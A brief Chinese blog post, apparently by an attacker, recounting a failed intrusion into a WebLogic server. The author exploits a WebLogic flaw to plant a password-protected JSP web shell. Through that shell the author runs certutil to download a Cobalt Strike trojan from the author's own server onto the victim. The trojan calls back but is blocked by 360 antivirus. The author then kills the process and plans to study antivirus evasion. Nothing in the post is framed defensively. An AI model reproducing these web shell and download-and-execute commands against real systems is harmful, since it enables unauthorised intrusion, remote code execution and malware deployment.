记一次失败的渗透

2019-06-26  本文已影响0人  migrate_
  1. 利用weblogic漏洞获取了一个shell,执行系统命令,当前是管理员权限
  2. http://x.x.x.x:7001/_async/.shell123.jsp?pwd=123&cmd=dir
    1.jpg
  3. 利用cs生成木马


    2.jpg
  4. 远程下载木马到当前目录
#当前网站目录
D:\Oracle\Middleware\user_projects\domains\base_dtdx_domain
#远程下载命令
http://x.x.x.x:7001/_async/.shell123.jsp?pwd=123&cmd=certutil -urlcache -split -f http://自己的服务器ip/artifact.exe artifact.exe
3.jpg 4.jpg
  1. 运行木马之后的确上线了


    5.jpg
  2. 但是任何功能都使用不了,为什么的呢?不会被杀了吧


    6.jpg
  3. 原来是360全家桶,接下来没思路了,暂且就到这里吧,是时候研究一下免杀了。。。
  4. 结束进程,撤退
tasklist
taskkill /f /pid 000
上一篇 下一篇

猜你喜欢

热点阅读